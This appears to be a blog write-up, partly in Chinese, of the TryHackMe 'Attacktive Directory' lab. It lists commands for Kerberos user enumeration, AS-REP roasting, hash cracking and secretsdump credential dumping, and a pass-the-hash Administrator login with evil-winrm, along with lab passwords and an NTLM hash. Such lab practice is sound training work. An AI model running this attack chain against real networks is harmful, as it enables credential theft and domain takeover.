【THM】Attacktive Directory-Practice
【THM】Attacktive Directory-Practice
hihopkc本文相关的TryHackMe实验房间链接:https://tryhackme.com/room/attacktivedirectory
Difficulty: Medium
1 | nmap -p- -sC -sV -T4 10.10.245.159 |
Task 3 Welcome to Attacktive Directory
What tool will allow us to enumerate port 139/445?
What is the NetBIOS-Domain Name of the machine?
What invalid TLD do people commonly use for their Active Directory Domain?
The next step, enumerating the two ports used by AD *139* and *445* with enum4linux the flag -a stands for all simple enumeration, It will gather information for us including (userlist, machine list(s), sharelist, password policy information, group and member list, …)
Task 4 Enumerating Users via Kerberos
A whole host of other services are running, including Kerberos. Kerberos is a key authentication service within Active Directory. With this port open, we can use a tool called Kerbrute (by Ronnie Flathers @ropnop) to brute force discovery of users, passwords and even password spray!
1 | ./kerbrute_linux_amd64 userenum --dc=10.10.245.159 -d=spooky.local userlist.txt |
I saved the usernames into another file to make things easier.
Task 5 Abusing Kerberos
After the enumeration of user accounts is finished, we can attempt to abuse a feature within Kerberos with an attack method called ASREPRoasting. ASReproasting occurs when a user account has the privilege “Does not require Pre-Authentication” set. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.
Impacket has a tool called “GetNPUsers.py” (located in impacket/examples/GetNPUsers.py) that will allow us to query ASReproastable accounts from the Key Distribution Center. The only thing that’s necessary to query accounts is a valid set of usernames which we enumerated previously via Kerbrute.
1 | python /opt/impacket/examples/GetNPUsers.py -usersfile validusers.txt -no-pass -dc-ip 10.10.245.159 spookysec.local/ |
So only *svc-admin* can request for a ticket without providing it’s password. Let’s grab the hash given and determine what it is over at hashcat.net
hashcat碰撞失败,待分析
1 | hashcat -m 18200 hash.txt passwordlist.txt |
提示这个
Device #1: Not enough allocatable device memory for this attack.
but 我用windows
management2005
Task 6 Back to the Basics
With a user’s account credentials we now have significantly more access within the domain. We can now attempt to enumerate any shares that the domain controller may be giving out.
1 | smbclient -L 10.10.245.159 -U "svc-admin" |
Task 7 Elevating Privileges within the Domain
使用我们的新凭据,我们可以获得更高的访问权限。此备份帐户可以是整个域控制器的备份,允许将所有 AD 更改(包括密码哈希)同步到此帐户。我们可以使用一个不同的 impacket 工具 secretsdump.py
来检索我们可以访问的所有密码哈希
1 | python /opt/impacket/examples/secretsdump.py backup:backup2517860@10.10.245.159 |
谷歌搜索以查看使用 NTLM 哈希进行横向移动的方法是什么
1 | gem install evil-winrm |
1 | evil-winrm -i 10.10.245.159 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc |